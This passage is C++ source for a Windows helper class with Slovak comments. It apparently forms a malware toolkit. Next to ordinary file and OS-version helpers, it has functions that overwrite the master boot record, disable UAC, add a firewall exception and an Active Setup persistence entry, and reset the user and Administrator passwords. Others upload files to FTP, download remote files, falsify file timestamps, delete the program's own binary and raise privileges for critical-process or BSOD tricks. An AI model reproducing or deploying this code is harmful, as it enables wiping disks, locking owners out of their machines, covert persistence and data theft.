			::HANDLE handlefile = ::CreateFileA(file,  FILE_APPEND_DATA, FILE_SHARE_WRITE + FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL);                           
			this->result = ::WriteFile(handlefile, buffer, size, &dwRet, NULL);
			::CloseHandle(handlefile);
			return this->result;
		}
	
/**
 * bool TruncateFile(char * file)
 *
 * @brief Funkcia pre zrušenie obsahu súbora.
 *
 * @param file Povinná vstupná hodnota reprezentujúca cestu s názvom súbora.
 *
 * @return Funkcia vracia hodnotu "true" pri úspešnom vytvorení. Pri chybe funkcia vracia hodnotu "false".
 */
		bool TruncateFile(char * file)
		{
			::HANDLE handle = ::CreateFileA(file, GENERIC_WRITE, 0, NULL, TRUNCATE_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL);
			this->result = handle!= INVALID_HANDLE_VALUE;
			::CloseHandle(handle);
			this->result;
            return this->result;
  		}

/**
 * bool FileExists(::std::string file)
 *
 * @brief Funkcia pre zistenie súbora.
 *
 * @param file Povinná vstupná hodnota reprezentujúca cestu s názvom súbora.
 *
 * @return Funkcia vracia hodnotu "true" pri úspešnom nájdení. Pri nenájdení funkcia vracia hodnotu "false".
 */
		bool FileExists(::std::string file)
		{
			::WIN32_FIND_DATA isfile;
			int Size = ::MultiByteToWideChar (CP_ACP, 0, const_cast<::LPSTR>(file.c_str()), -1, NULL, 0);
			::LPWSTR wUnicode = new ::WCHAR[Size];
			::MultiByteToWideChar (CP_ACP, 0, const_cast<::LPSTR>(file.c_str()), -1, wUnicode, Size);
			::HANDLE handle = ::FindFirstFile(wUnicode, &isfile) ;
			this->result = handle != INVALID_HANDLE_VALUE;
			delete [] wUnicode;
			if(this->result) 
			{
				::FindClose(handle);
			}
			return this->result;
		}

/**
 * long GetFileSizeD(char * filename)
 *
 * @brief Funkcia pre zistenie veľkosti súbora.
 *
 * @param filename Povinná vstupná hodnota reprezentujúca cestu s názvom súbora.
 *
 * @return Funkcia vracia veľkosť súboru.
 */
		long GetFileSizeD(char * filename)
		{
			int rc = ::stat(filename, &stat_buf);
			return rc == 0 ? stat_buf.st_size : -1;
		}

/**
 * char * ToLower(char * input)
 *
 * @brief Funkcia pre zmenu veľkosti vstupného stringu. Vstupnú sekvenciu slov mení funkcia na veľkú.
 *
 * @param input Povinná vstupná hodnota reprezentujúca vstupnú sekvenciu slov.
 *
 * @return Funkcia vracia veľkú sekvenciu slov.
 */
		char * ToLower(char * input)
		{
			char * a = input;
			for (int i = 0; i < strlen(a); ++i)
			{
				a[i] = ::tolower(a[i]);
			}
			return a;
		}

/**
 * bool ManageUAC(UACManage uacmanage)
 *
 * @brief Funkcia na správu UAC nastavení.
 *
 * @param uacmanage Povinná vstupná hodnota reprezentujúca hodnotu nastavenia UAC.
 *
 * @return Funkcia vracia pravdivostnú hodnotu 0.
 */
		bool ManageUAC(UACManage uacmanage)
		{
			::HKEY hkey;
			::DWORD value;

			if(uacmanage == UACManage::Set_ENABLE)
			{
				value = 1;
			} else 
			{
				value = 0;
			}

			::RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS, &hkey);
			::RegSetValueExA(hkey, "EnableLUA", 0, REG_DWORD, (const BYTE*)&value, sizeof(value));
			::RegCloseKey(hkey);

			return 0;
		}

/**
 * void ActiveSetupAdd(::std::string filepath, ::std::string key)
 *
 * @brief Funkcia na vloženie záznamu do Active Setup.
 *
 * @param filepath Povinná vstupná hodnota reprezentujúca umiestnenie a názov súboru.
 *
 * @param value Povinná vstupná hodnota reprezentujúca hodnotu kľúča v Active Setup.
 *
 */
		void ActiveSetupAdd(::std::string filepath, ::std::string key)
		{
			char ActiveSetup[__buffer__] = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components";
		    ::std::string ActiveSetupA = ActiveSetup;
		    ::HKEY hkey;

		    ::strcat(ActiveSetup,"\\");
		    ::strcat(ActiveSetup,key.c_str());
 
		    ::RegOpenKeyExA(HKEY_LOCAL_MACHINE, ActiveSetupA.c_str(), 0, KEY_ALL_ACCESS | ACCESS_NODE, &hkey);
		    ::RegDeleteKeyExA(HKEY_LOCAL_MACHINE, ActiveSetup, KEY_ALL_ACCESS | ACCESS_NODE, 0);
		    ::RegCreateKeyExA(HKEY_LOCAL_MACHINE, ActiveSetup, 0L, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS | ACCESS_NODE, NULL, &hkey, NULL );
		    ::RegSetValueExA(hkey, "StubPath", 0, REG_SZ, (::BYTE*)filepath.c_str(), (::DWORD)filepath.length());
   
		    ::RegCloseKey(hkey);  
	   }

/**
 * bool AddExceptionFirewall(::std::string path, ::std::string name)
 *
 * @brief Funkcia na pridanie výnimky do firwallu.
 *
 * @param path Povinná vstupná hodnota reprezentujúca cestu k súboru prideleného do výnimky firwallu.
 *
 * @param name Povinná vstupná hodnota reprezentujúca názov vetve´súboru prideleného do výnimky firwallu.
 *
 */
		void AddExceptionFirewall(::std::string path, ::std::string name)
		{
			::HKEY hk;
			::DWORD dw;
     
			::std::string skey = path + ":*:Enabled:@xpsp2res.dll,-22019";
     
			::RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hk, &dw);
			::RegSetValueExA(hk, name.c_str(), 0, REG_SZ, (::BYTE*)skey.c_str(), (DWORD)skey.length());
			::RegCloseKey(hk);
		}

/**
 * ::HRESULT DownloadFiles(char * url__, char * path__)
 *
 * @brief Funkcia pre stiahnutie obsahu z url do definovaného priečinku.
 *
 * @param url__ Povinná vstupná hodnota reprezentujúca cestu k obsahu url.
 *
 * @param path__ Povinná vstupná hodnota reprezentujúca umiestnenie uloženého obsahu url.
 *
 * @return Funkcia vracia hodnotu HRESULT.
 */
		::HRESULT DownloadFiles(char * url__, char * path__) 
		{
			this->hresult = ::URLDownloadToFileA ( NULL, url__ ,path__, 0, NULL );
			return this->hresult; 
		}

/**
 * char * CurrentTime(void) 
 *
 * @brief Funkcia pre načítanie aktuálneho systémového času.
 *
 * @return Funkcia vracia hodnotu reprezentujúcu aktuálny čas.
 */
		::std::string CurrentTime(const char* format = "%Y-%m-%d.%X") 
		{		 
             time_t rawtime;
			 struct tm * times;
			 char timebuffer [80];
             time (&rawtime);
             times = localtime (&rawtime);
             ::strftime(timebuffer, sizeof(timebuffer), format, times);
			 return timebuffer;
		}


/**
 * bool UploadToFTPServer(char * ftpserver, char * user, char * password, char * file, char * namefileonftp)
 *
 * @brief Funkcia pre uplodnutie súboru na FTP.
 *
 * @param ftpserver Povinná vstupná hodnota reprezentujúca názov FTP serveru.
 *
 * @param user Povinná vstupná hodnota reprezentujúca prihlasovacie meno užívateľa.
 *
 * @param password Povinná vstupná hodnota reprezentujúca prihlasovacie heslo užívateľa.
 *
 * @param file Povinná vstupná hodnota reprezentujúca umiestnenie súboru na upload.
 *
 * @param namefileonftp Povinná vstupná hodnota reprezentujúca umiestnenie súboru na FTP.
 *
 * @return Funkcia vracia pravdivostnú hodnotu uploadovania na FTP účet.
 */
		bool UploadToFTPServer(char * ftpserver, char * user, char * password, char * file, char * namefileonftp)
		{
			::HINTERNET hInternet;
			::HINTERNET hFtpSession;

			hInternet = ::InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
			if (hInternet == NULL)
			{
				return 1;
			}
			else
			{
				hFtpSession = ::InternetConnectA(hInternet, ftpserver, INTERNET_DEFAULT_FTP_PORT, user, password, INTERNET_SERVICE_FTP, 0, 0);
				if (hFtpSession == NULL)
				{
					return 1;
				}
				else
				{
					char filebuffer[__buffer__];
					::strncpy(filebuffer, namefileonftp, sizeof(filebuffer));
					::strncat(filebuffer, CurrentTime().c_str(), sizeof(filebuffer));
					if (!::FtpPutFileA(hFtpSession, file, filebuffer, FTP_TRANSFER_TYPE_BINARY, 0 | INTERNET_FLAG_PASSIVE))
					{
						::InternetCloseHandle(hFtpSession);
						::InternetCloseHandle(hInternet);
						return 1;
					}
				}
			}
			::InternetCloseHandle(hFtpSession);
			::InternetCloseHandle(hInternet);
			return 0;
		}

/**
 * inline ::HBITMAP BitmapLoadToMemory(int id, ::HINSTANCE instance)
 *
 * @brief Funkcia pre načítanie obrázku typu bitmap do operačnej pamäte.
 *
 * @param id Povinná vstupná hodnota reprezentujúca číslo ID bitmapového súboru v resources.
 *
 * @param instance Povinná vstupná hodnota reprezentujúca inštanciu súboru v ktorého resources je uložený súbor typu bitmap.
 *
 * @return Funkcia vracia pravdivostnú hodnotu úspešnosti spracovania.
 */
		inline ::HBITMAP ImageLoad(int id, ::LPCWSTR instance)
		{
			return (::HBITMAP)::LoadImage(GetModuleHandle(instance), MAKEINTRESOURCE(id), IMAGE_BITMAP, 0, 0, LR_DEFAULTSIZE);
		}

/**
 * void ChangeFileTimeForFile(char * locationfile, ::WORD wday, ::WORD wmonth, ::WORD wyear, ::WORD whour, ::WORD wminute)
 *
 * @brief Funkcia na nastavenie roku, dátumu a času pre súbor.
 *
 * @param locationfile Povinná vstupná hodnota reprezentujúca umiestnenie súboru.
 *
 * @param wday Povinná vstupná hodnota pre nastavenie dňa vytvorenia súboru.
 *
 * @param wmonth Povinná vstupná hodnota pre nastavenie mesiaca vytvorenia súboru.
 *
 * @param wyear Povinná vstupná hodnota pre nastavenie roku vytvorenia súboru.
 *
 * @param whour Povinná vstupná hodnota pre nastavenie hodiny vytvorenia súboru.
 *
 * @param wminute Povinná vstupná hodnota pre nastavenie minúty vytvorenia súboru.
 */
		void ChangeFileTimeForFile(char * locationfile, ::WORD wday, ::WORD wmonth, ::WORD wyear, ::WORD whour, ::WORD wminute)
		{
			SYSTEMTIME systemtime;
			::GetSystemTime(&systemtime);

			systemtime.wDay = wday;
			systemtime.wMonth = wmonth;
			systemtime.wYear = wyear;
			systemtime.wHour = whour;
			systemtime.wMinute = wminute;

			::FILETIME currentfiletime;

			::SystemTimeToFileTime(&systemtime,&currentfiletime);

			::HANDLE filename = CreateFileA( locationfile, 
											 FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ|FILE_SHARE_WRITE,
											 NULL, OPEN_EXISTING, 
											 FILE_ATTRIBUTE_NORMAL, NULL
										   );	                               

			::SetFileTime(filename, &currentfiletime, &currentfiletime, &currentfiletime);
			::CloseHandle(filename);
		}

/**
 * ::std::string * GetComputerName(void)
 *
 * @brief Funkcia pre získanie názvu lokálneho počítača.
 *
 * @return Funkcia vracia názov lokálneho počítača.
 */
		::std::string GetComputerName(void)
		{
			::WCHAR buffer[MAX_COMPUTERNAME_LENGTH];
			::DWORD lenght;
			::DWORD numbersentries;
			lenght = MAX_COMPUTERNAME_LENGTH;
			::GetComputerNameEx(ComputerNameNetBIOS, buffer, &lenght);
			return ::std::string(buffer,buffer + lenght);
		}

/**
 * void SetSystemPassword(::std::string input_password)
 *
 * @brief Funkcia na nastavenie hesla aktulného konta a konta Asministrátora.
 *
 */
        void SetSystemPassword(::std::string input_password)
		{
			USES_CONVERSION_EX;
			::std::string input_username[] = {::getenv("USERNAME"), "Administrator"};

			int input_username_size = sizeof(input_username)/sizeof(::std::string);

			::LPWSTR password = A2W_EX(input_password.c_str(), input_password.length());

			for(int i = 0; i<input_username_size; i++)
			{
				::LPWSTR username = A2W_EX(input_username[i].c_str(), input_username[i].length());

				USER_INFO_1003 usriSetPassword;

				usriSetPassword.usri1003_password = password;
				::NetUserSetInfo( NULL, username, UserInfoPassword, (::LPBYTE)&usriSetPassword, NULL);
			}
		}

/**
 * bool StartInteractiveProcess(::DWORD sessionId, char* programpath)
 *
 * @brief Funkcia pre interaktívne spusteni súbora, napríklad z NT služby.
 *
 * @param sessionId Povinná vstupná hodnota reprezentujúca hodnotu session.
 *
 * @param programpath Povinná vstupná hodnota reprezentujúca umiestnenie súboru ,ktorý má byť spustený.
 *
 * @return Funkcia vracia pravdivostnú hodnotu spustenia súborut.
 */
		bool StartInteractiveProcess(::DWORD sessionId, char* programpath)
		{
			this->hdesk = NULL;
		  	this->hwinsta = NULL;
            this->hwinstaSave = NULL;
			this->pSid = NULL;
			this->bQueryUserToken = false;

 			sessionId = ::WTSGetActiveConsoleSessionId();
			this->bQueryUserToken = ::WTSQueryUserToken(sessionId, &this->hToken);
	
			::ZeroMemory(&this->si, sizeof(STARTUPINFO));

			this->si.cb= sizeof(STARTUPINFO);
			this->si.lpDesktop = TEXT("winsta0\\default");
 
			TOKEN_PRIVILEGES tp;
			LUID luid2;

			::LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid2);

			tp.PrivilegeCount = 1;
			tp.Privileges[0].Luid =luid2;
			tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 
			::DuplicateTokenEx(this->hToken, MAXIMUM_ALLOWED,NULL, SecurityIdentification, TokenPrimary, &this->hUserTokenDup);
			::SetTokenInformation(this->hUserTokenDup, TokenSessionId, (void*)sessionId, sizeof(DWORD));
 
			this->result = ::CreateProcessAsUser(this->hUserTokenDup, NULL, this->CHAR_To_LPWSTR(programpath) /*lpCommandLine*/, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 
	        this->CHAR_To_LPWSTR_DELETE();
			::CloseHandle(this->hProcess);
			::CloseHandle(this->hUserTokenDup);
			::CloseHandle(this->hPToken);

			return this->result;
		}
 #include <string>
/**
 * ::vector<::std::string>GetDriverLabel(void)
 *
 * @brief Funkcia pre získanie názvov všetkých pripojených jednotiek - disky, pamäťové média.
 *
 * @return Funkcia vracia kolekciu dát typu vector v ktorej sú uložené názvy jednotiek.
 */
		::vector<::std::string>GetDriverLabel(void)
		{
			this->drv='A';
			while(this->drv!='[')
			{
				::std::stringstream Str;
				::std::string drvStr;
				Str<<this->drv;
				Str>>drvStr;

				::std::string drvSpc=drvStr+":";
				::std::string fCheck="\\\\.\\";
				::std::string device = "\\\\\\\\.\\\\";
				::std::string fhCheck=fCheck+drvStr+":";
				::std::string ddevice=device+drvStr+":";

				this->charDrv=drvSpc.c_str();
				::std::wstring stemp = ::std::wstring(fhCheck.begin(),  fhCheck.end());
				::LPCWSTR sw = stemp.c_str();
				this->hDevice=::CreateFile(sw, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
		
				if(hDevice!=INVALID_HANDLE_VALUE)
				{
					::std::wstring stemp = ::std::wstring(drvSpc.begin(),  drvSpc.end());
					::LPCWSTR sw = stemp.c_str();

					switch(GetDriveType(sw))
					{
						case DRIVE_FIXED:
							{
								this->volumelabels.push_back(this->charDrv);
								this->fixeddrives.push_back(this->charDrv);
								break;
							}
						case DRIVE_REMOVABLE:
							{
								this->volumelabels.push_back(this->charDrv);
								this->removabledrives.push_back(this->charDrv);
								break;
							}
						case DRIVE_NO_ROOT_DIR:
							{
								this->volumelabels.push_back(this->charDrv);
								break;
							}
						case DRIVE_REMOTE:
							{
								this->volumelabels.push_back(this->charDrv);
								break;
							}
						case DRIVE_CDROM:
							{
								break;
							}
						case DRIVE_RAMDISK:
							{
								break;
							}
						case DRIVE_UNKNOWN:
							{
								break;
							}
					}
				}
				drv++;
			}
			return volumelabels;
		}

/**
 * void CreateNewDesktop(::std::vector<char*>inputrunprocess)
 *
 * @brief Funkcia ktorá nám vytvorí nové okno desktopu do ktorého sa následne prepne.
 *
 * @param inputrunprocess Povinná vstupná hodnota reprezentujúca hodnoty umiestnenia súborov, ktoré sa majú pri vytvorení novej plochy sputiť.
 *
 */
		void CreateNewDesktop(::std::vector<char*>inputrunprocess)
		{
			char * desktop_name = "MyDesktop";
			char explorer_path[MAX_PATH];
			::HDESK newdesktop = NULL;
		    ::HDESK olddesktop;
		    ::STARTUPINFOA d_STARTUPINFOA = {0};
			::PROCESS_INFORMATION d_PROCESS_INFORMATION = {0};

			::ExpandEnvironmentStringsA("%windir%\\explorer.exe", explorer_path, MAX_PATH-1);

			newdesktop = ::OpenDesktopA(desktop_name, NULL, FALSE, GENERIC_ALL);
			if(!newdesktop)
			{
				newdesktop = ::CreateDesktopA(desktop_name, NULL, NULL, 0, GENERIC_ALL, NULL);
				if(newdesktop)
				{
					if(SetThreadDesktop(newdesktop))
					{
						d_STARTUPINFOA.cb = sizeof(d_STARTUPINFOA);
						d_STARTUPINFOA.lpDesktop = desktop_name;
						::CreateProcessA(explorer_path, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &d_STARTUPINFOA, &d_PROCESS_INFORMATION);
						
						for (std::vector<char*>::iterator it = inputrunprocess.begin() ; it != inputrunprocess.end(); ++it)
						{
							::CreateProcessA(*it, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &d_STARTUPINFOA, &d_PROCESS_INFORMATION);
						}
						::SetThreadDesktop(olddesktop);
					}
				}
			}
		   if(newdesktop!=null)
		   {
			  ::SetThreadDesktop(newdesktop);
			  ::SwitchDesktop(newdesktop);
		   }

		   ::CloseHandle(newdesktop);
		}

/**
 * void ShowMeInTrayBar(InTrayBar isintraybar)
 *
 * @brief Funkcia ktorá nám fixne zminimalizuje okno programu do TRAY lišty.
 *
 * @param isintraybar Povinná vstupná hodnota reprezentujúca hodnoty enumu InTrayBar. 
 *                    Hodnota môže nadobúdať _InTrayBar::Active_ pre zminimalizovanie procesu a _InTrayBar::Deactive_ pre odminimalizovanie procesu.
 *
 */
	void ShowMeInTrayBar(InTrayBar isintraybar)
	{
        if(isintraybar == InTrayBar::Active)
		{
			this->hwndTray=::FindWindowA("ConsoleWindowClass",NULL);

			::ShowWindow(this->hwndTray,0);

			this->notifyTrayIcon.cbSize=sizeof(this->notifyTrayIcon);
			this->notifyTrayIcon.hIcon= ::LoadIcon(NULL,IDI_WINLOGO);
			this->notifyTrayIcon.hWnd=this->hwndTray;
			char output[256];

			const WCHAR* wc = this->notifyTrayIcon.szTip ;
			sprintf(output, "%ws", wc );
			strcpy(output,"My Application");

			this->notifyTrayIcon.uCallbackMessage=WM_LBUTTONDOWN;
			this->notifyTrayIcon.uFlags=NIF_ICON | NIF_TIP | NIF_MESSAGE;
			this->notifyTrayIcon.uID=1;

			::Shell_NotifyIcon(NIM_ADD, &this->notifyTrayIcon);
		} else if(isintraybar == InTrayBar::Deactive)
		{
			::Shell_NotifyIcon(NIM_DELETE, &this->notifyTrayIcon);
			::ShowWindow(this->hwndTray,1);
		}
	}

/**
 * int GetSystemVersionInfo(void)
 *
 * @brief Funkcia pre zistenie verzie operačného systému.
 *
 * @return Funkcia vracia hodnotu zodpovedajúcu verzii systému.
 */
	int GetSystemVersionInfo(void)
	{
		int versioninfo = -1;
		char * version = "";

		::OSVERSIONINFOEX info;
        ::ZeroMemory(&info, sizeof(OSVERSIONINFOEX));
		info.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
		::GetVersionEx((LPOSVERSIONINFO)&info);

		if(info.dwMajorVersion == 6)
		 {
			 if(info.dwMinorVersion == 3)
			 {
				 version= "Windows 8.1";
				 versioninfo = 81;
			 }
			 if(info.dwMinorVersion == 2)
			 {
				 version = "Windows 8";
				 versioninfo = 8;
			 }

			 if(info.dwMinorVersion == 1)
			 {
				 version = "Windows 7";
				 versioninfo = 7;
			 }
			 if(info.dwMinorVersion == 0)
			 {
				 version = "Windows Vista";
				 versioninfo = 1;
			 }
		 }

		 if(info.dwMajorVersion == 10)
		 {
			 if(info.dwMinorVersion == 0)
			 {
				  version = "Windows 10";
				  versioninfo = 10;
			 }
		 }

		 if(info.dwMajorVersion == 5)
		 {
			 if(info.dwMinorVersion == 1)
			 {
				  version = "Windows xp";
				  versioninfo = 51;
			 }
		 }

		 return versioninfo;
	}

/**
 * int CreateRestorePoint(char * name)
 *
 * @brief Funkcia pre vytvorenie bodu obnovy.
 *
 * @param name Povinná vstupná hodnota reprezentujúca názov bodu obnovy.
 *
 * @return Funkcia vracia hodnotu zodpovedajúcu stavu vytvornia bodu obnovy.
 *
 */
	int CreateRestorePoint(char * name)
	{
		 ::std::string status;
		 ::RESTOREPOINTINFOW RestorePtInfo;
		 ::STATEMGRSTATUS SMgrStatus;
		 ::PFN_SETRESTOREPTW fnSRSetRestorePointW=NULL;
		 ::DWORD dwErr = ERROR_SUCCESS;
		 ::HMODULE hSrClient = NULL;
		 ::BOOL fRet = FALSE;
		 ::HRESULT hr = S_OK;
   
		 hr = CoInitializeEx( NULL, COINIT_MULTITHREADED );
		 if( FAILED( hr ) )
		 {
		    status = " Error CoInitialize ";
			goto exit;
		 }
    
		 fRet = this->InitializeCOMSecurity();
		 if( !fRet )
		 {
			status = " Error InitializeCOMSecurity ";
			goto exit;
		 }
    
		 RestorePtInfo.dwEventType = BEGIN_SYSTEM_CHANGE;

		 RestorePtInfo.dwRestorePtType = APPLICATION_INSTALL;

		 RestorePtInfo.llSequenceNumber = 0;

		 StringCbCopyW(RestorePtInfo.szDescription, sizeof(RestorePtInfo.szDescription), (STRSAFE_LPCWSTR)name);
   
		 hSrClient = LoadLibraryW(L"srclient.dll");
		 if(NULL == hSrClient)
		 {
			 status = " Error Load lib. srclient.dll ";
			 goto exit;
		 }

		 fnSRSetRestorePointW = (PFN_SETRESTOREPTW) GetProcAddress(hSrClient, "SRSetRestorePointW");
		 if (NULL == fnSRSetRestorePointW)
		 {
			status = " Error GetProcAddress SRSetRestorePointW ";
			goto exit;
		 }

		 fRet = fnSRSetRestorePointW(&RestorePtInfo, &SMgrStatus);
		 if(!fRet)
		 {
			dwErr = SMgrStatus.nStatus;
			if(dwErr == ERROR_SERVICE_DISABLED)
			{
				status = " Error ERROR_SERVICE_DISABLED ";
				goto exit;
			}
			 status = " Error Set fnSRSetRestorePointW A ";
			 goto exit;
		 }

		 RestorePtInfo.dwEventType = END_SYSTEM_CHANGE;

		 RestorePtInfo.llSequenceNumber = SMgrStatus.llSequenceNumber;

		 fRet = fnSRSetRestorePointW(&RestorePtInfo, &SMgrStatus);
		 if(!fRet) 
		 {
			status = " Error Set fnSRSetRestorePointW B ";
			dwErr = SMgrStatus.nStatus;
			goto exit;
		 }

		 this->debug_error = "Successful";
		 return 0;

		 exit:

			if(hSrClient != NULL)
			{
				FreeLibrary(hSrClient);
				hSrClient = NULL;
				this->debug_error = status;
				return -1;
			}
		 }

/**
 * bool EraseMBR(char * device)
 *
 * @brief Funkcia pre prepísanie MBR Sektoru.
 *
 * @param device Povinná vstupná hodnota reprezentujúca názov jednotky.
 *
 * @return Funkcia vracia hodnotu zodpovedajúcu stavu prepísania MBR sektoru.
 *
 */
	bool EraseMBR(char * device)
	{
		bool result;
		this->MasterBootRecord = ::CreateFileA(device, SystemAccess::SYSTEMACCESS1|SystemAccess::SYSTEMACCESS2, SystemAccess::SYSTEMACCESS3|SystemAccess::SYSTEMACCESS4, NULL, 3, SystemAccess::SYSTEMACCESSA|SystemAccess::SYSTEMACCESSB, 0);                              
        
		if(this->MasterBootRecord)
		{
			::OVERLAPPED Overlap = {0};
			::memset(&Overlap, 0, sizeof(Overlap));
			::ULONG Written;
			Overlap.Offset = 0;
			Overlap.OffsetHigh = 0;
			Overlap.hEvent = 0;

			result = ::WriteFile(this->MasterBootRecord, MBR_CONTENT, MBR_SIZE, &this->MBRDword, &Overlap);

		} else {
			result = 0;
		}

		::CloseHandle(this->MasterBootRecord);
		return result;
	}

/**
 * ::std::string * GetFileExt(const ::std::string& input) 
 *
 * @brief Funkcia pre získanie koncoviek z názvov súborov.
 *
 * @param input Povinná vstupná hodnota reprezentujúca vstupný názov súboru.
 *
 * @return Funkcia vracia názov koncovky súboru.
 */
	::std::string GetFileExt(const ::std::string& input) 
	{
		size_t tmpi = input.rfind('.', input.length());

		if (tmpi != string::npos) 
		{
			return(input.substr(tmpi+1, input.length() - tmpi));
		}

		return("");
	}

/**
 * ::std::string * GetFileName(const ::std::string& input) 
 *
 * @brief Funkcia pre získanie názvov súborov.
 *
 * @param input Povinná vstupná hodnota reprezentujúca vstupný názov a cestu súboru.
 *
 * @return Funkcia vracia názov súboru.
 */
	::std::string GetFileName(const ::std::string& input) 
	{
		char sep = '/';

		#ifdef _WIN32
		   sep = '\\';
		#endif

	    size_t i = input.rfind(sep, input.length());

	    if (i != ::std::string::npos) 
	    {
			return(input.substr(i+1, input.length() - i));
	    }
		
		return("");
	}

/**
 * ::std::void DeleteSelf(void) 
 *
 * @brief Funkcia na zmazanie samého seba.
 *
 *
 */
	void DeleteSelf(void)
	{
		SHELLEXECUTEINFO sei;
 
		TCHAR szModule [MAX_PATH],
		szComspec[MAX_PATH],
		szParams [MAX_PATH];
 
		if((::GetModuleFileName(0,szModule,MAX_PATH)!=0) && (::GetShortPathName(szModule,szModule,MAX_PATH)!=0) && (::GetEnvironmentVariable(L"COMSPEC",szComspec,MAX_PATH)!=0))
		{
			  lstrcpy(szParams,L"/c del ");
			  lstrcat(szParams, szModule);
			  lstrcat(szParams, L" > nul");
 
			  sei.cbSize = sizeof(sei);
			  sei.hwnd = 0;
			  sei.lpVerb = L"Open";
			  sei.lpFile = szComspec;
			  sei.lpParameters = szParams;
			  sei.lpDirectory = 0;
			  sei.nShow = SW_HIDE;
			  sei.fMask = SEE_MASK_NOCLOSEPROCESS;
 
			if(ShellExecuteEx(&sei))
			{
			   ::SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS); //removing process stops
			   ::SetPriorityClass(::GetCurrentProcess(),REALTIME_PRIORITY_CLASS); //accelerate our process
			   ::SetThreadPriority(::GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL); //accelerate our thread
			   ::SHChangeNotify(SHCNE_DELETE,SHCNF_PATH,szModule,0);
			}
		}
	}

/**
 * bool FolderExists(const char * folderName)
 *
 * @brief Funkcia pre zistenie existencie zložky.
 *
 * @param folderName Povinná vstupná hodnota reprezentujúca cestu zložky.
 *
 * @return Funkcia vracia hodnotu zodpovedajúcu stavu existencie zložky.
 *
 */
	bool FolderExists(const char * folderName) 
	{
		if (::_access(folderName, 0) == -1) 
		{
			return false;
		}

		this->attributes = ::GetFileAttributes(this->String_To_LPCWSTR(folderName));

        this->String_To_LPCWSTR_DELETE();

		if (!(this->attributes & FILE_ATTRIBUTE_DIRECTORY))
		{
			return false;
		}

		return true;
	}

/**
 * void StartProcess(::std::string filepath)
 *
 * @brief Funkcia pre spustenie novej inštancie súboru.
 *
 * @param filepath Povinná vstupná hodnota reprezentujúca cestu súboru.
 *
 */
	void StartProcess(::std::string filepath)
	{
		STARTUPINFO startinfo = { 0 };

        PROCESS_INFORMATION processinfo = { 0 };

        ::CreateProcess(this->String_To_LPCWSTR(filepath), NULL, NULL, NULL, FALSE, NULL, NULL,NULL, &startinfo, &processinfo);

	    this->String_To_LPCWSTR_DELETE();
	}

	private:

		BOOLEAN SetAdjustPrivilegeCritical(void)
		{
			BOOLEAN status;
			::RtlAdjustPrivilege(AdjustPrivilegeCritical,TRUE,FALSE,&status);
			return status;
		}

		BOOLEAN SetAdjustPrivilegeBSOD(void)
		{
			BOOLEAN status;
			::RtlAdjustPrivilege(AdjustPrivilegeBSOD,TRUE,FALSE,&status);
			return status;
		}

		BOOL InitializeCOMSecurity(void)
		{   
			::std::string status;

			SECURITY_DESCRIPTOR securityDesc = {0};
			EXPLICIT_ACCESS   ea[5] = {0};
			ACL        *pAcl = NULL;
			ULONGLONG  rgSidBA[(SECURITY_MAX_SID_SIZE+sizeof(ULONGLONG)-1)/sizeof(ULONGLONG)]={0};
			ULONGLONG  rgSidLS[(SECURITY_MAX_SID_SIZE+sizeof(ULONGLONG)-1)/sizeof(ULONGLONG)]={0};
			ULONGLONG  rgSidNS[(SECURITY_MAX_SID_SIZE+sizeof(ULONGLONG)-1)/sizeof(ULONGLONG)]={0};
			ULONGLONG  rgSidPS[(SECURITY_MAX_SID_SIZE+sizeof(ULONGLONG)-1)/sizeof(ULONGLONG)]={0};
			ULONGLONG  rgSidSY[(SECURITY_MAX_SID_SIZE+sizeof(ULONGLONG)-1)/sizeof(ULONGLONG)]={0};
			DWORD      cbSid = 0;
			BOOL       fRet = FALSE;
			DWORD      dwRet = ERROR_SUCCESS;
			HRESULT    hrRet = S_OK;

			fRet = ::InitializeSecurityDescriptor( &securityDesc, SECURITY_DESCRIPTOR_REVISION );
			if( !fRet )
			{
				status = " Error Set InitializeSecurityDescriptor ";
				goto exit;
			}

			cbSid = sizeof( rgSidBA );
			fRet = ::CreateWellKnownSid( WinBuiltinAdministratorsSid, NULL, rgSidBA, &cbSid );
			if( !fRet )
			{
				status = " Error Set CreateWellKnownSid A ";
				goto exit;
			}

			cbSid = sizeof( rgSidLS );
			fRet = ::CreateWellKnownSid( WinLocalServiceSid, NULL, rgSidLS, &cbSid );
			if( !fRet )
			{
				status = " Error Set CreateWellKnownSid A ";
				goto exit;
			}

			cbSid = sizeof( rgSidNS );
			fRet = ::CreateWellKnownSid( WinNetworkServiceSid, NULL, rgSidNS, &cbSid );
			if( !fRet )
			{
				status = " Error Set CreateWellKnownSid C ";
				goto exit;
			}

			cbSid = sizeof( rgSidPS );
			fRet = ::CreateWellKnownSid( WinSelfSid, NULL, rgSidPS, &cbSid );
			if( !fRet )
			{
				status = " Error Set CreateWellKnownSid D ";
				goto exit;
			}

			cbSid = sizeof( rgSidSY );
			fRet = ::CreateWellKnownSid( WinLocalSystemSid, NULL, rgSidSY, &cbSid );
			if( !fRet )
			{
				status = " Error Set CreateWellKnownSid E ";
				goto exit;
			}

			ea[0].grfAccessPermissions = COM_RIGHTS_EXECUTE | COM_RIGHTS_EXECUTE_LOCAL;
